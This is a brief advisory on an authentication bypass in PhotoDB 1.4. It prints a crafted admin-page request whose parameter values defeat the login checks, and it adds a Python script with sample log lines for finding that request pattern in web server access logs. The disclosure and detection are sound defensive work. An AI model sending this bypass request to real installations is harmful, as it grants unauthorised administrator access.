PhotoDB 1.4 is a PHP-based photo management and display system. It makes use of a simple authentication script that can easily be bypassed to gain administrator access. This is done by submitting a request with the following parameters to the administrator's page:

/[THEADMINSPAGE]?PHPSESSID=abc123&Time=9999999999999&rmtusername=hop&rmtpassword=hop&accessevel=-5

The values for the parameters given above circumvent the simple checks the script employs, as described in the analysis by "frog frog".
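To check whether this request pattern has reached a PhotoDB installation, the web server's access log can be searched for query strings that set the parameters named above. The following is an added example, not part of the original advisory or of PhotoDB. The log lines, the /photodb/ADMINPAGE path and the two-parameter threshold are constructed assumptions, as is treating these parameters in a URL as suspicious.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names copied from the advisory's request. Flagging them when they
# appear in a query string is an assumption of this example. PHP variable
# names are case-sensitive, so the match is exact.
AUTH_STATE_PARAMS = {"Time", "rmtusername", "rmtpassword", "accessevel"}

# Leading fields of a common/combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_auth_param_requests(lines, min_params=2):
    """Return (ip, timestamp, status, param names) for every request whose
    query string sets at least min_params of the auth-state parameters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m["target"]).query
        # parse_qs percent-decodes names, so encoded variants are caught too.
        supplied = set(parse_qs(query, keep_blank_values=True)) & AUTH_STATE_PARAMS
        if len(supplied) >= min_params:
            hits.append((m["ip"], m["ts"], int(m["status"]), sorted(supplied)))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /photodb/index.php?album=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /photodb/ADMINPAGE?PHPSESSID=abc123&Time=9999999999999'
    '&rmtusername=hop&rmtpassword=hop&accessevel=-5 HTTP/1.1" 200 8841',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /photodb/index.php?Time=1 HTTP/1.1" 200 5120',
    'not an access log line',
]

if __name__ == "__main__":
    for ip, ts, status, params in find_auth_param_requests(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} set: {', '.join(params)}")
```

Only the query string is inspected, so the same parameters sent in a POST body do not appear in this output. A logged 200 status shows the page was served, not that access was granted.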